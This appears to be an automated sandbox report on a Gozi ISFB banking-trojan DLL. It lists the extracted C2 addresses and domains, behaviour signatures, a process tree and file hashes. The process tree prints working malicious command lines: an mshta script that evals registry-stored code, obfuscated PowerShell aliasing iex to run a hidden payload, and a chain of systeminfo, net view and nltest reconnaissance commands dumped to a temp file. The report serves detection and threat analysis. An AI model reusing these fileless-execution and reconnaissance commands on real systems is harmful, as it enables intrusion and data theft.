Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2022 09:29

General

  • Target

    62ea3f935563b.dll

  • Size

    300KB

  • MD5

    614e312af0e5de7c6b9819e3a1c766d4

  • SHA1

    01e384618d8eadb244184e66e6450752ea0ceade

  • SHA256

    982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

  • SHA512

    362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3452
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3752
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2144
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4732
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nju8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nju8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vvxjvnatxo -value gp; new-alias -name yfnjcifda -value iex; yfnjcifda ([System.Text.Encoding]::ASCII.GetString((vvxjvnatxo "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2160
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5056
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9625.tmp" "c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP"
              5⤵
                PID:3696
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3472
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp" "c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP"
                5⤵
                  PID:4788
          • C:\Windows\system32\cmd.exe
            cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4380
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic computersystem get domain
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4148
            • C:\Windows\system32\more.com
              more
              3⤵
                PID:4912
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:4916
              • C:\Windows\system32\cmd.exe
                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                2⤵
                  PID:3408
                • C:\Windows\system32\cmd.exe
                  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4476
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo.exe
                    3⤵
                    • Gathers system information
                    PID:1308
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                  2⤵
                    PID:2092
                  • C:\Windows\system32\cmd.exe
                    cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2808
                    • C:\Windows\system32\net.exe
                      net view
                      3⤵
                      • Discovers systems in the same network
                      PID:5116
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                    2⤵
                      PID:2328
                    • C:\Windows\system32\cmd.exe
                      cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1224
                      • C:\Windows\system32\nslookup.exe
                        nslookup 127.0.0.1
                        3⤵
                          PID:1160
                      • C:\Windows\system32\cmd.exe
                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                        2⤵
                          PID:3956
                        • C:\Windows\system32\cmd.exe
                          cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3248
                          • C:\Windows\system32\tasklist.exe
                            tasklist.exe /SVC
                            3⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2860
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                          2⤵
                            PID:3700
                          • C:\Windows\system32\cmd.exe
                            cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                            2⤵
                              PID:3692
                              • C:\Windows\system32\driverquery.exe
                                driverquery.exe
                                3⤵
                                  PID:3472
                              • C:\Windows\system32\cmd.exe
                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                2⤵
                                  PID:2120
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                  2⤵
                                    PID:2336
                                    • C:\Windows\system32\reg.exe
                                      reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                      3⤵
                                        PID:1556
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                      2⤵
                                        PID:1792
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                        2⤵
                                          PID:2140
                                          • C:\Windows\system32\net.exe
                                            net config workstation
                                            3⤵
                                              PID:796
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 config workstation
                                                4⤵
                                                  PID:4252
                                            • C:\Windows\system32\cmd.exe
                                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                              2⤵
                                                PID:4996
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                2⤵
                                                  PID:1088
                                                  • C:\Windows\system32\nltest.exe
                                                    nltest /domain_trusts
                                                    3⤵
                                                      PID:3592
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                    2⤵
                                                      PID:1124
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                      2⤵
                                                        PID:1208
                                                        • C:\Windows\system32\nltest.exe
                                                          nltest /domain_trusts /all_trusts
                                                          3⤵
                                                            PID:2920
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                          2⤵
                                                            PID:4356
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                            2⤵
                                                              PID:4852
                                                              • C:\Windows\system32\net.exe
                                                                net view /all /domain
                                                                3⤵
                                                                • Discovers systems in the same network
                                                                PID:4476
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                              2⤵
                                                                PID:3312
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                                2⤵
                                                                  PID:1704
                                                                  • C:\Windows\system32\net.exe
                                                                    net view /all
                                                                    3⤵
                                                                    • Discovers systems in the same network
                                                                    PID:696
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                                  2⤵
                                                                    PID:1808
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\80C6.bin1 > C:\Users\Admin\AppData\Local\Temp\80C6.bin & del C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
                                                                    2⤵
                                                                      PID:3952
                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    PID:4544

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v6

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.dll

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    929399503519dcbb0b02be8c65c3b3ca

                                                                    SHA1

                                                                    3b017d0db8bd09320e0523dc51388fd87ba6cd4d

                                                                    SHA256

                                                                    adbb52f5a1c2eac7517deaf63d3a59e345e66c07537bd8cda39944ebcc9e0639

                                                                    SHA512

                                                                    6c5845741449c8ac32b3364cdca8e037b7a8092cc5ec956a3fd5c3983ab90b637e79ed99ec669abb7955d3084d9b7b4c28e273ef0a25bcdbc6cc493432a91d6d

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    6bd79a5adab7a3e2068c0427e0e4b70c

                                                                    SHA1

                                                                    d4159171c427cdd8e11336d21666960b3624f178

                                                                    SHA256

                                                                    bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b

                                                                    SHA512

                                                                    34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    MD5

                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                    SHA1

                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                    SHA256

                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                    SHA512

                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    7127823022c7a932f96be727f3ddc34a

                                                                    SHA1

                                                                    a29cdec64f59727a5eaedf30cb98f5444aa4249d

                                                                    SHA256

                                                                    2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f

                                                                    SHA512

                                                                    2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    7127823022c7a932f96be727f3ddc34a

                                                                    SHA1

                                                                    a29cdec64f59727a5eaedf30cb98f5444aa4249d

                                                                    SHA256

                                                                    2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f

                                                                    SHA512

                                                                    2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    a5f20a41aab2cab03bd597d49d14f77e

                                                                    SHA1

                                                                    49366784d753ad7071d4a45682499d395fca5f25

                                                                    SHA256

                                                                    18bc37c219505ce44a8b8c77941eb2f901da13de2e4a7741b8efcf67e25bb121

                                                                    SHA512

                                                                    fa382a6f8a55a7553c112d243e9178f348b397a7af6dc5a66213641554dd28ee7074f4015615bcf9fd9f82ba7906b7fff953ab91de05e9d9368b7d4393a807b1

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    b19ff771046a3c130ed5b585522e87f7

                                                                    SHA1

                                                                    dc7fbb6af7033c894904b51f855862723cdaa161

                                                                    SHA256

                                                                    73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b

                                                                    SHA512

                                                                    5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    b19ff771046a3c130ed5b585522e87f7

                                                                    SHA1

                                                                    dc7fbb6af7033c894904b51f855862723cdaa161

                                                                    SHA256

                                                                    73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b

                                                                    SHA512

                                                                    5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    9KB

                                                                    MD5

                                                                    6d6a8b3f318fd3d8cef74f5a606d175b

                                                                    SHA1

                                                                    bbf142b78df2ef8bae740e28e29499f98f443144

                                                                    SHA256

                                                                    6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add

                                                                    SHA512

                                                                    3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    9KB

                                                                    MD5

                                                                    6d6a8b3f318fd3d8cef74f5a606d175b

                                                                    SHA1

                                                                    bbf142b78df2ef8bae740e28e29499f98f443144

                                                                    SHA256

                                                                    6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add

                                                                    SHA512

                                                                    3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    35KB

                                                                    MD5

                                                                    f970ec5d20d2fba20631ebcd079bde53

                                                                    SHA1

                                                                    a68f1ea0ac316fecc6d140097950a86c203a48e4

                                                                    SHA256

                                                                    4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4

                                                                    SHA512

                                                                    9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    35KB

                                                                    MD5

                                                                    f970ec5d20d2fba20631ebcd079bde53

                                                                    SHA1

                                                                    a68f1ea0ac316fecc6d140097950a86c203a48e4

                                                                    SHA256

                                                                    4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4

                                                                    SHA512

                                                                    9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    64KB

                                                                    MD5

                                                                    b14ca353fa4187bac21f5ab89ba9a11c

                                                                    SHA1

                                                                    fed2d6b01963a4aac5ec7942f5d7e09ca6ddf310

                                                                    SHA256

                                                                    0f629f4157821999e27bbd0f8fd0443d62589646daa6cbd165292a876194c943

                                                                    SHA512

                                                                    ba1c82cb93e0c33574c806a6680e2594e30d4af8c90379b36ae46199d4e19d9ba7a0eb46f1b120398c810f84ec673f12b164ef39049235bb4b12e0b6a1965905

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    64KB

                                                                    MD5

                                                                    714de7881b6a1035c086c517850de473

                                                                    SHA1

                                                                    2f7d0b5388ae3169c976b82a41a6463d83b2c635

                                                                    SHA256

                                                                    d14c84a41e44ae9c73535af482c1e7fae5db45c1400fab66f8b7dcec66ac900e

                                                                    SHA512

                                                                    4150c13a5c1b598965ad8cf5aa98d0e23405fecb7c2917598621c375fcaa7afeb22b1e588fb06ed1ab63b462a6ea8bfbebf56b7ff62290dba4bf35bdee6e79c9

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    64KB

                                                                    MD5

                                                                    f598a0e91678e4a3ab5262f92a2fc126

                                                                    SHA1

                                                                    faf8e24e200debcb4ea8c1a5fc97d3428e0981c5

                                                                    SHA256

                                                                    e426336dfe2774f86b7cb3c1962a86d5eae6c7c22f4d4117edf3d819eda8bc3b

                                                                    SHA512

                                                                    199dfc3cf019979c8146c873d06b5e0b8a893db0adb0dc4e2e27231801b9e9ea47335144bd2357b81ab4ab1ed03e854020c84e41f2b45519e149255578bb1101

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    491781928626aa6de588e5e1e944e765

                                                                    SHA1

                                                                    38b2d33c01fc8fa99b7fa029d9cf54d803118030

                                                                    SHA256

                                                                    1031f0822bb6b82b229e312d363c79c6f513c5dd9eab88a545e8e897d5728571

                                                                    SHA512

                                                                    2118849ffbbfdb731041b3d05516083fe386541fadf2908eff0935620f8d4076e79581896465da11f74331d812c633c73da184f80e75343f3df7c3e9b7b75f8f

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    855fc1aa369e8cc7fce0b1957427918e

                                                                    SHA1

                                                                    20e2a9272e85fdc40a08cbf4dbba9e6d3d7f8fa4

                                                                    SHA256

                                                                    a6326c7a78fd3240e9ee70e2666ee60dcbbac5f24d642d9038a8075542009c20

                                                                    SHA512

                                                                    2b69fb54aa6fbba546c9339b5efbf675e3ba25f661158bf609ba63ca6f96241ff01aec9c34415a09b42606a6864ecdef941a767d1f3994845605c078ff45f11a

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    44d578ac531f2f93c3a515e3f72a4e62

                                                                    SHA1

                                                                    7517f39370ac5fc4a80c7572d3a5c15aebe0fb2f

                                                                    SHA256

                                                                    64b087f809be517e84779845447554cf9103bc52953202f330d84f24ae252838

                                                                    SHA512

                                                                    4bf075c425a9f4d6b5869e91ec533de5a2d15c8a1d8fb9b5c39f1b49b555629a4720ce65e4323bf6c84fd6b3083392e387ce7f6386b5f1c96280ef727d2b736d

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    561bef9af1d2b3cd08f865fe88ed8b87

                                                                    SHA1

                                                                    de383abc60321ffa36cb8d718bdc9205b4300764

                                                                    SHA256

                                                                    8f60e06f4a1d259c2cbe505612fa9b4972a8d04703f95ec9baa42d57e6d37463

                                                                    SHA512

                                                                    03da980c68887047560a3b305c23b9ffc067b1798bca12a94390af6573ce3d9acbd55c696bd602e83075bb599d61e32da1c7d5312a20c0ea3515207a3715820d

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    6bd79a5adab7a3e2068c0427e0e4b70c

                                                                    SHA1

                                                                    d4159171c427cdd8e11336d21666960b3624f178

                                                                    SHA256

                                                                    bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b

                                                                    SHA512

                                                                    34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES9625.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    1ca03a1553f812f0678f5b98f50ea950

                                                                    SHA1

                                                                    c987674ceb9b3d027fb76bb53ed76afe05fe9f1b

                                                                    SHA256

                                                                    96d987b9edd809d181bbea3c6311a66bd9654a27dc1d4d35f05f40783aa446b3

                                                                    SHA512

                                                                    f132989e5f2eb20b61259544746eec2aad0aca903da18b3d0d646ef6dfc2c9f81b1b2a5031c50a2890b4b133bf03e19b494d816583fa255109862b1070851f48

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    9c1e57a168ffbe153f29f31014779080

                                                                    SHA1

                                                                    6388960cee0042722bde558269e7717a2a47651f

                                                                    SHA256

                                                                    3351f350fc93dbabef3b4ae0ef2a164b056c1d44a356cc4f5c3d851b7af609ae

                                                                    SHA512

                                                                    d0174befbb77cfcf4108362abeab7d116a1383a35cbfc183c41e057ec674f4831e79abf00f1bfcbefccca062a699d8df14a75ad64e990ba01aacf813dbe2fb5a

                                                                  • C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.dll

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    e116c9d2033d807e7e238b4ef1b62441

                                                                    SHA1

                                                                    fd4a8a21145c7f14175ddf512a5ae51fdbd5fd5d

                                                                    SHA256

                                                                    a4685e10bc3da377f654b68bd161c8bd97be457743fb2b6dba04ec5d47df03e9

                                                                    SHA512

                                                                    a852a55a7701571fa02b653fda04a682a83de09dcfc781a66f96e5eb927b0d45e0b775e00162eafd5127e2459c6c5abd03b9d8f08bda2ae629691d7d24d71229

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.0.cs

                                                                    Filesize

                                                                    400B

                                                                    MD5

                                                                    aca9704199c51fde14b8bf8165bc2a4c

                                                                    SHA1

                                                                    789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                    SHA256

                                                                    cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                    SHA512

                                                                    a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline

                                                                    Filesize

                                                                    369B

                                                                    MD5

                                                                    9ec4f73902f40ee643aaa0697b535eff

                                                                    SHA1

                                                                    7bea1ea1aceab43bfa0345aabc5936818b2229a9

                                                                    SHA256

                                                                    146619eb310e9d43a5d2c03943336d8fc77eb2d786b02c68082aa6ccc04a4cc9

                                                                    SHA512

                                                                    5489f12f36cfe5a0c6af91a0b2083dada40debeb7e20745c241f8ed24986c7d483ce18c19821e9e89c73be4196de9f20d6881df6066edc9da50522dca72aeb80

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    007da9aaa12d1c816666f84ca72ec4f1

                                                                    SHA1

                                                                    34d50bd86ddf66c225bcd5ba9c14ffef879f018d

                                                                    SHA256

                                                                    36fdaee98e5341b537ec8c09357bdd90dcec22bb81b4b7e5782d0d85b29b8380

                                                                    SHA512

                                                                    a73d6892ad244b0cd638cf1203f0a60f1136fdc5fb1a499ff35bf3170428ef2f6ee9fd5998a101e9122f7352ecfd22ac0f33cdb220dad34b6fac1399a8b0e5d7

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    9ebd13fda96930a951c29c9803189680

                                                                    SHA1

                                                                    89a6da69cd5ca511ac20a150ef2849474513e647

                                                                    SHA256

                                                                    159f13f12ded6836e650aafe4ae2c8e4bb4c4e6e2d57d7aec584afa5830118b1

                                                                    SHA512

                                                                    9219145b9c53edd6ec84bb30cc9f7046e674355a0168f893337807d54fa6ebc5c53f7aedc4fab7cfc00ecc0179bfa0d33e778868791c8374e4cfc22f5bfa8a30

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.0.cs

                                                                    Filesize

                                                                    410B

                                                                    MD5

                                                                    9a10482acb9e6952b96f4efc24d9d783

                                                                    SHA1

                                                                    5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                    SHA256

                                                                    a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                    SHA512

                                                                    e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline

                                                                    Filesize

                                                                    369B

                                                                    MD5

                                                                    0fd42ad9d1fcf2ecc458caeea500074d

                                                                    SHA1

                                                                    f6253dae00cd2c7e74d65c5bfb97df4d4afd0695

                                                                    SHA256

                                                                    b8d79550fe87187ab73bd3a2e17bcc4c9daea4c771359d86af0969a0068fe610

                                                                    SHA512

                                                                    161e119ec04a2ecc61fa153545586f39c78db2eabcc821953129abbe04790cc62dbae8a4a91d3ed84c799662d4836d0c50769b404fb43dc8ccdda2375495e135

                                                                  • memory/696-228-0x0000000000000000-mapping.dmp

                                                                  • memory/796-210-0x0000000000000000-mapping.dmp

                                                                  • memory/1032-161-0x00000000085F0000-0x0000000008693000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/1032-186-0x00000000085F0000-0x0000000008693000-memory.dmp

